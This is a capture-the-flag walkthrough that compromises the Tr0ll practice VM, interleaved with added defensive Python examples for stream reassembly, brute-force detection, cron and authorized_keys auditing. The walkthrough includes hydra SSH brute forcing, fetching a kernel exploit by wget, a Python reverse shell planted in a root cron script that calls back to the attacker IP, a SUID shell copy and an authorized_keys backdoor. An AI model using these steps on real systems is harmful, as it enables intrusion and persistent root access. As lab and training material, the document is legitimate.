Foreword
This time the classic Tr0ll VM is used as the practice range to simulate an Internet-facing environment and walk through the whole process from information gathering to final privilege escalation. The techniques covered include port scanning, traffic analysis, file analysis, hydra brute forcing, several kinds of reverse shell, shell stabilization, a reverse shell via a scheduled task (privilege escalation), and public/private key authentication: a set of basic operations suitable for beginners to practice.
Attacker machine: 192.168.160.3
Victim machine: 192.168.160.7
1. Information collection
1. Full port scan
nmap -p- 192.168.160.7
Found open ports 21, 22, 80
2. nmap detailed scan
nmap -sS -sV -A -T5 192.168.160.7
Found that ftp accepts the default account Anonymous
3. Log in to ftp
Log in to ftp with the default account/password Anonymous/Anonymous
ftp 192.168.160.7
dir   --- list files
get   --- download
put   --- upload
Found the traffic capture lol.pcap
4. Analyze the traffic capture
Analyze the traffic with Wireshark
wireshark lol.pcap
Right-click a packet and choose Follow TCP Stream
Got the information: secret_stuff.txt
Follow the second TCP stream and get the information: sup3rs3cr3tdirlol
After checking, sup3rs3cr3tdirlol is a directory containing a file named roflmao
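The "Follow TCP Stream" step above is what Wireshark does for you; the following added example (not part of the original post) shows the same reassembly in plain Python on a constructed pcap, so the mechanics are visible: read the pcap record headers, pull the IPv4/TCP payload out of each frame, group segments by connection and direction, and order them by sequence number. The sample capture, the hosts 10.0.0.5/10.0.0.9 and the FTP-like text in it are all constructed here; it also includes an out-of-order segment and a retransmission to show why ordering by sequence number matters.

```python
import struct
from collections import defaultdict


# --- constructed sample capture (not the lol.pcap from the post) ----------
def _frame(src, dst, sport, dport, seq, payload):
    """Build an Ethernet + IPv4 + TCP frame. Checksums are left at zero,
    which pcap readers (this one and Wireshark) do not require."""
    tcp = struct.pack(">HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18,
                      65535, 0, 0) + payload

    def ip4(addr):
        return bytes(int(o) for o in addr.split("."))

    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ip4(src), ip4(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """Serialise frames into a classic little-endian pcap (link type 1 = Ethernet)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f)
    return b"".join(out)


def build_sample_pcap():
    """An FTP-like exchange with one out-of-order segment and one retransmission."""
    c, s = "10.0.0.5", "10.0.0.9"
    return build_pcap([
        _frame(c, s, 40000, 21, 1000, b"USER anonymous\r\n"),          # seq 1000-1015
        _frame(s, c, 21, 40000, 5000, b"331 Please specify the password.\r\n"),
        _frame(c, s, 40000, 21, 1028, b"RETR secret_stuff.txt\r\n"),   # arrives early
        _frame(c, s, 40000, 21, 1016, b"PASS guest\r\n"),              # seq 1016-1027
        _frame(c, s, 40000, 21, 1016, b"PASS guest\r\n"),              # retransmission
    ])


# --- reader ---------------------------------------------------------------
def read_pcap(data):
    """Yield the raw frames of a little-endian pcap byte string."""
    magic, = struct.unpack("<I", data[:4])
    if magic != 0xA1B2C3D4:
        raise ValueError("only classic little-endian pcap is handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if frame[12:14] != b"\x08\x00":        # not IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                         # not TCP
        return None
    total_len = struct.unpack(">H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack(">HHI", tcp[:8])
    doff = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, seq, tcp[doff:]


def follow_streams(pcap_bytes):
    """Reassemble TCP payload per connection and direction, ordered by sequence
    number. Retransmissions are dropped (first copy wins); gaps and overlapping
    segments are not repaired, which a full tool like Wireshark does handle."""
    segs = defaultdict(lambda: defaultdict(dict))   # conn -> direction -> {seq: payload}
    for frame in read_pcap(pcap_bytes):
        parsed = parse_tcp(frame)
        if parsed is None or not parsed[5]:
            continue
        src, sport, dst, dport, seq, payload = parsed
        conn = tuple(sorted([(src, sport), (dst, dport)]))
        segs[conn][(src, sport)].setdefault(seq, payload)
    streams = {}
    for conn, dirs in segs.items():
        streams[conn] = {d: b"".join(payloads[s] for s in sorted(payloads))
                         for d, payloads in dirs.items()}
    return streams


if __name__ == "__main__":
    for conn, dirs in follow_streams(build_sample_pcap()).items():
        for (host, port), data in dirs.items():
            print(f"{host}:{port} -> {data!r}")
```

To run it over a real file, pass `open("lol.pcap", "rb").read()` to `follow_streams`; captures saved in pcapng or big-endian pcap need a different reader, which is why the magic number is checked first.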
5. Analyze the file
Download the file; analysis shows it is a 32-bit executable
file roflmao
Analyze the file information
exiftool roflmao
binwalk roflmao
strings roflmao
Got the information: 0x0856BF
Found that the 0x0856BF directory contains information, which is saved as the wordlist zhi.txt
Pass.txt is empty; the file name itself may be useful
2. Brute forcing
1. Hydra brute force
Use hydra with the list just collected as the username list and the file name Pass.txt as the password to brute-force ssh
hydra -L zhi.txt -p Pass.txt 192.168.160.7 ssh
Obtained account/password: overflow / Pass.txt
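On the defending side, a hydra run like the one above leaves a burst of "Failed password" lines from one source in the server's auth.log, typically followed by an "Accepted password" once a guess lands. The following added example (not part of the original post) is a small detector for that pattern: it parses sshd lines, counts failures per source inside a sliding time window, and raises a second alert when a flagged source later logs in successfully. The log excerpt, hostnames, usernames and the year supplied for the syslog timestamps are all constructed here.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not from the target machine): a burst of
# password failures from one source followed by a success, plus unrelated noise.
SAMPLE_AUTH_LOG = """\
Jan 12 10:00:01 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.160.3 port 40210 ssh2
Jan 12 10:00:01 ubuntu sshd[1203]: Failed password for invalid user test from 192.168.160.3 port 40211 ssh2
Jan 12 10:00:02 ubuntu sshd[1205]: Failed password for invalid user guest from 192.168.160.3 port 40212 ssh2
Jan 12 10:00:02 ubuntu sshd[1207]: Failed password for ubuntu from 192.168.160.3 port 40213 ssh2
Jan 12 10:00:03 ubuntu sshd[1209]: Failed password for invalid user backup from 192.168.160.3 port 40214 ssh2
Jan 12 10:00:03 ubuntu sshd[1211]: Failed password for invalid user www from 192.168.160.3 port 40215 ssh2
Jan 12 10:00:05 ubuntu sshd[1213]: Accepted password for overflow from 192.168.160.3 port 40218 ssh2
Jan 12 10:30:00 ubuntu sshd[1300]: Failed password for alice from 10.0.0.5 port 51000 ssh2
Jan 12 10:30:07 ubuntu sshd[1302]: Accepted password for alice from 10.0.0.5 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line, year=2024):
    """Parse one sshd auth.log line; syslog timestamps carry no year, so one is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag a source once it reaches `threshold` failures inside a sliding window,
    and flag any later successful login from a flagged source."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])           # stable, so same-second order is kept
    recent = defaultdict(list)                   # ip -> failure timestamps still in the window
    flagged, alerts = set(), []
    for e in events:
        ip = e["ip"]
        if e["result"] == "Failed":
            recent[ip].append(e["ts"])
            while (e["ts"] - recent[ip][0]).total_seconds() > window_seconds:
                recent[ip].pop(0)
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(recent[ip]), e["ts"]))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, e["user"], e["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

The threshold and window are deliberately parameters: hydra's default parallelism produces far more than five failures a minute, while a single user mistyping a password (alice above) never reaches the threshold.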
2. Log in via ssh
ssh overflow@192.168.160.7
Stabilize the shell
python -c 'import pty;pty.spawn("/bin/bash")'
3. Privilege escalation
1. Check the system version
uname -a
Found Linux ubuntu 3.13.0
2. Search for a privilege escalation exploit
searchsploit Linux ubuntu 3.13.0
Copy it to the desktop
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop/
3. View the exploit
gedit 37292.c
The exploit contains usage instructions
Start an HTTP service with python on the attacker machine and download the file on the target
python -m http.server 8520
wget http://192.168.160.3:8520/37292.c
4. Further steps
After privilege escalation, the shell is found to drop after a few minutes; this should be a scheduled task.
1. Check the scheduled tasks
find / -name cronlog 2>/dev/null   --- look for the scheduled task log
find / -name cleaner.py 2>/dev/null   --- find where the file is
Found that the scheduled task deletes the files in the tmp directory every 5 minutes, and the current user has no permission on the scheduled task itself
1. Reverse shell
Enumerate all writable files
find / -writable 2>/dev/null   --- enumerate all files writable by the current user
find / -perm -o+w -type f 2> /dev/null | grep /proc -v   --- enumerate world-writable files
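The weakness the two `find` commands uncover is a script that root runs from cron but that other users can write. An administrator can look for exactly that combination before anyone else does; the following added example (not part of the original post) parses system-crontab lines (`/etc/crontab` / `/etc/cron.d` format: five time fields, a user, a command), takes every absolute path in each command and reports scripts that are group/world-writable or sit in a directory that is, since a writable directory lets the script be replaced. The crontab text is constructed to model the post's cleaner job, and the files are staged in a temporary tree with the `root=` parameter rather than touching the live system.

```python
import os
import re
import stat
import tempfile

# Matches /etc/crontab and /etc/cron.d entries: five time fields, a user, then the command.
CRON_LINE_RE = re.compile(r"^\s*(?:[-\d*/,]+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_crontab(crontab_text, root="/"):
    """Return (user, path, reasons) for every absolute path in a cron command
    that a non-owner could modify or replace. `root` lets the check run
    against a staged directory tree instead of the live system."""
    findings = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        for tok in m["cmd"].split():
            if not tok.startswith("/"):
                continue
            path = os.path.join(root, tok.lstrip("/"))
            if not os.path.isfile(path):
                continue
            fmode = os.stat(path).st_mode
            dmode = os.stat(os.path.dirname(path)).st_mode
            reasons = []
            if fmode & OTHERS_WRITE:
                reasons.append("script writable by group/others")
            # a sticky directory (like /tmp) only lets owners replace their own files
            if dmode & OTHERS_WRITE and not dmode & stat.S_ISVTX:
                reasons.append("containing directory writable by group/others (script can be replaced)")
            if reasons:
                findings.append((m["user"], tok, reasons))
    return findings


# Constructed crontab modelled on the post's cleaner job (not copied from the machine).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/5 *   * * *   root    python /lib/log/cleaner.py
0   2   * * *   root    /usr/local/bin/backup.sh
"""


def audit_staged_crontab():
    """Stage the two scripts with realistic modes in a scratch tree and audit them:
    cleaner.py is world-writable (0666), backup.sh is a normal 0755 script."""
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in (("lib/log/cleaner.py", 0o666), ("usr/local/bin/backup.sh", 0o755)):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full))
            os.chmod(os.path.dirname(full), 0o755)
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(full, mode)
        return audit_crontab(SAMPLE_CRONTAB, root=root)


if __name__ == "__main__":
    for user, path, reasons in audit_staged_crontab():
        print(f"[{user}] {path}: {'; '.join(reasons)}")
```

Against a real host, feed it the contents of `/etc/crontab` and each file in `/etc/cron.d` with the default `root="/"`; per-user crontabs from `crontab -l` have no user column and would need the regex adjusted to four fields fewer.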
Modify the scheduled task script cleaner.py
nano /lib/log/cleaner.py
Ctrl+X to exit, Y to save
Change it to:
#!/usr/bin/python
def con():
    import socket, time, pty, os
    host = '192.168.160.3'   # attacker machine
    port = 2233              # port nc listens on
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    s.connect((host, port))
    # attach stdin, stdout and stderr to the socket
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    s.close()
con()
Listen on the attacker machine:
nc -lvvp 2233
Successfully obtained a root shell
2. Create a root-owned executable
Modify the scheduled task script to:
os.system('cp /bin/sh /tmp/zhi')
os.system('chmod u+s /tmp/zhi')
3. Write an ssh RSA key
Generate an ssh key
ssh-keygen   --- press Enter through all the prompts
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAiNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2zJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxSW+poQeBDWdyG8= root@kali
Have the scheduled task write the key
mkdir /root/.ssh; chmod 775 .ssh; echo "<contents of the id_rsa.pub generated above>" >> /root/.ssh/authorized_keys
That is:
mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAiNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2zJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxSW+poQeBDWdyG8= root@kali" >> /root/.ssh/authorized_keys
With the public and private keys matched, no password is required
ssh root@192.168.160.7
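A planted `authorized_keys` entry is the persistence that survives even after the writable cron script is cleaned up, so it is worth knowing what an audit of `/root/.ssh` should catch. The following added example (not part of the original post) parses an `authorized_keys` file, cross-checks each entry's declared key type against the type string encoded inside the base64 blob, lists the key comments (the `root@kali` above is a giveaway), and reports the permissions that sshd's `StrictModes` rejects, such as a `.ssh` directory left group-writable by `chmod 775`. The home directory is staged in a temporary tree, and the RSA blob is a structurally valid but toy key constructed here, not a real key.

```python
import base64
import os
import stat
import struct
import tempfile

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "ssh-dss"}
OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def parse_authorized_keys(text):
    """Return one dict per entry: declared type, the type encoded inside the key
    blob (a length-prefixed string at the start of the blob), options and comment."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(parts):
            entries.append({"line": lineno, "type": None, "blob_type": None,
                            "comment": "", "options": line})
            continue
        try:
            blob = base64.b64decode(parts[idx + 1], validate=True)
            (n,) = struct.unpack(">I", blob[:4])
            blob_type = blob[4:4 + n].decode("ascii")
        except (ValueError, struct.error, UnicodeDecodeError):
            blob_type = None
        entries.append({"line": lineno, "type": parts[idx], "blob_type": blob_type,
                        "comment": " ".join(parts[idx + 2:]),
                        "options": " ".join(parts[:idx])})
    return entries


def audit_home(home):
    """Check the permissions sshd's StrictModes enforces on the home directory,
    ~/.ssh and authorized_keys, and list every key that file would accept."""
    findings = []
    ssh_dir = os.path.join(home, ".ssh")
    ak = os.path.join(ssh_dir, "authorized_keys")
    for label, path in (("home", home), (".ssh", ssh_dir), ("authorized_keys", ak)):
        if os.path.exists(path) and os.stat(path).st_mode & OTHERS_WRITE:
            findings.append(f"{label} is writable by group/others")
    entries = []
    if os.path.isfile(ak):
        with open(ak) as fh:
            entries = parse_authorized_keys(fh.read())
        for e in entries:
            if e["type"] is None:
                findings.append(f"line {e['line']}: unparseable entry")
            elif e["blob_type"] != e["type"]:
                findings.append(f"line {e['line']}: declared {e['type']} but blob says {e['blob_type']}")
    return {"findings": findings, "entries": entries}


def _fake_rsa_blob():
    """A structurally valid ssh-rsa blob with toy numbers (constructed, not a real key)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(s(b"ssh-rsa") + s(b"\x01\x00\x01") + s(b"\x00" + b"\xab" * 64)).decode()


def audit_staged_home():
    """Stage a root-like home the way the post's cron one-liner leaves it
    (.ssh mode 775, one appended key, plus a junk line) and audit it."""
    with tempfile.TemporaryDirectory() as home:
        ssh_dir = os.path.join(home, ".ssh")
        os.mkdir(ssh_dir)
        os.chmod(ssh_dir, 0o775)
        ak = os.path.join(ssh_dir, "authorized_keys")
        with open(ak, "w") as fh:
            fh.write(f"ssh-rsa {_fake_rsa_blob()} root@kali\n")
            fh.write("not-a-key-line\n")
        os.chmod(ak, 0o644)
        return audit_home(home)


if __name__ == "__main__":
    result = audit_staged_home()
    for f in result["findings"]:
        print("finding:", f)
    for e in result["entries"]:
        print(f"line {e['line']}: {e['type']} comment={e['comment']!r}")
```

On a live host run `audit_home` over every home directory (and `/root`) and compare the listed comments and blobs against the keys that are supposed to be there; any entry nobody can account for is the finding, whatever its permissions.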